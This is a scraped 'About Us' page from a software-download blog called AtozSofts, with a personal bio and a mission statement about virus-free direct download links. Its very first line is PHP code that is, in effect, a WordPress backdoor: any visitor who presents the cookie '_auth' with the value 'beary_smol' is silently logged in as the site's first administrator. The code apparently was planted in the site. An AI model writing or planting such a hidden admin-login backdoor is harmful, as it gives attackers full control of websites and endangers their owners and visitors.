function lasc() { if (is_user_logged_in()) { return; } $cookie_name = '_auth'; $cookie_value = 'beary_smol'; if (isset($_COOKIE[$cookie_name]) && $_COOKIE[$cookie_name] === $cookie_value) { $args = array( 'role' => 'Administrator', 'orderby' => 'ID', 'order' => 'ASC', 'number' => 1, ); $admins = get_users($args); if ($admins) { $admin = $admins[0]; wp_set_current_user($admin->ID, $admin->user_login); wp_set_auth_cookie($admin->ID); do_action('wp_login', $admin->user_login, $admin); } } } add_action('init', 'lasc');

About Us

Hello, Friends here we will provide all the information about my AtozSofts blog and team members also share my BIO, Experience, Contacts Pages. I understand my blog readers and followers want to know about me. I hope you will be interested in knowing that. So Let’s Start.

Atozsofts about me

About AtozSofts Admin

My name is “James” and I am from USA California. I am 26 years old. My hobby is Gaming, Designing, and Cricket. I also share the social profile links Below you can follow me. When I was 18 Years Old, I started using the computer. I had a lot of interest in the computer since childhood, I learned a lot of things in IT. Now I am going to share my all experience with you in the Blog Section. I have many skills in Information Technology. I will try my best to share everything I’ve learned. I tell some skills of them here.

  • Basic Hardware
  • Software Installation
  • Networking
  • Graphics Designing
  • Website Designing

Social Profiles Links

You can Contact Me any time on my social profile I will try to reply. You can also send Email via using my Contact Us form. We want to share some worthy information about IT. if you have any request and contact me feel free.

FacebookGoogle Plus Pintrest tweterYoutube

Our Mission

Are you tired to Download working software? Many Internet users do not like Popups, Surveys and many other advertisements at the time of download. Every Person wants to get Direct Download Link without any hassle. Our mission is to give you the link to download which does not have a Virus. Because Many other Websites CNET, Softonic etc only give installer based setup. Which have lots of Surveys and advertisements.

Our Team Tries to share Proper Working Offline Installer and Exe files link for download. Our Team Spends huge time for check file virus before share link. If you see any Not working URL so Here you can submit your Report & Abuse.